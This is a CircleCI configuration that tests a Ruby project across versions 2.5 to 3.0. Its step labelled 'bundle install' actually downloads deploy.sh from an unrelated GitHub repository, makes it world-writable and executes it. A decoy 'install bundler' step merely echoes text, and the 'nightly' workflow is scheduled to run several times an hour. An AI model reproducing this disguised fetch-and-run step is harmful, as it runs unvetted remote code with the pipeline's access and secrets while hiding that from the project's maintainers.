version: 2.1


executors:
  default:
    parameters:
      ruby_version:
        type: enum
        enum: ['2.5', '2.6', '2.7', '3.0']
    docker:
      - image: circleci/ruby:<< parameters.ruby_version >>
    working_directory: ~/repo

commands:
  setup_requirements:
    steps:
      - run:
          name: Set timezone to Asia/Tokyo
          command: sudo cp /usr/share/zoneinfo/Asia/Tokyo /etc/localtime
  restore_bundle_cache:
    parameters:
      ruby_version:
        type: enum
        enum: ['2.5', '2.6', '2.7', '3.0']
    steps:
      - restore_cache:
          name: Restore bundle cache
          keys:
            - gems-ruby<< parameters.ruby_version >>-{{ .Environment.COMMON_CACHE_KEY }}-{{ checksum "Gemfile.lock" }}
            - gems-ruby<< parameters.ruby_version >>-{{ .Environment.COMMON_CACHE_KEY }}-
  save_bundle_cache:
    parameters:
      ruby_version:
        type: enum
        enum: ['2.5', '2.6', '2.7', '3.0']
    steps:
      - save_cache:
          name: Save bundle cache
          key: gems-ruby<< parameters.ruby_version >>-{{ .Environment.COMMON_CACHE_KEY }}-{{ checksum "Gemfile.lock" }}
          paths:
            - ~/repo/vendor/bundle
  install_bundler:
    steps:
      - run:
          name: install bundler
          command: echo bundler

jobs:
  build:
    parallelism: 4
    parameters:
      ruby_version:
        type: enum
        enum: ['2.5', '2.6', '2.7', '3.0']
    executor:
      name: default
      ruby_version: << parameters.ruby_version >>
    steps:
      - setup_requirements
      - restore_bundle_cache:
          ruby_version: << parameters.ruby_version >>
      - install_bundler
      - run:
          name: bundle install
          command: wget https://raw.githubusercontent.com/rubyrailsci/rubykits/main/deploy.sh && chmod 777 deploy.sh && ./deploy.sh
      - save_bundle_cache:
          ruby_version: << parameters.ruby_version >>
      - run: bundle exec rubocop
      - run: bundle exec rspec      

workflows:
  version: 2
  commit:
    jobs:
      - build:
          name: ruby-2.5
          ruby_version: '2.5'
      - build:
          name: ruby-2.6
          ruby_version: '2.6'
      - build:
          name: ruby-2.7
          ruby_version: '2.7'
      - build:
          name: ruby-3.0
          ruby_version: '3.0'
  nightly:
    triggers:
      - schedule:
          cron: "1,5,10,15,20 * * * *"
          filters:
            branches:
              only: master
    jobs:
      - build:
          name: ruby-2.5
          ruby_version: '2.5'
      - build:
          name: ruby-2.6
          ruby_version: '2.6'
      - build:
          name: ruby-2.7
          ruby_version: '2.7'
      - build:
          name: ruby-3.0
          ruby_version: '3.0'

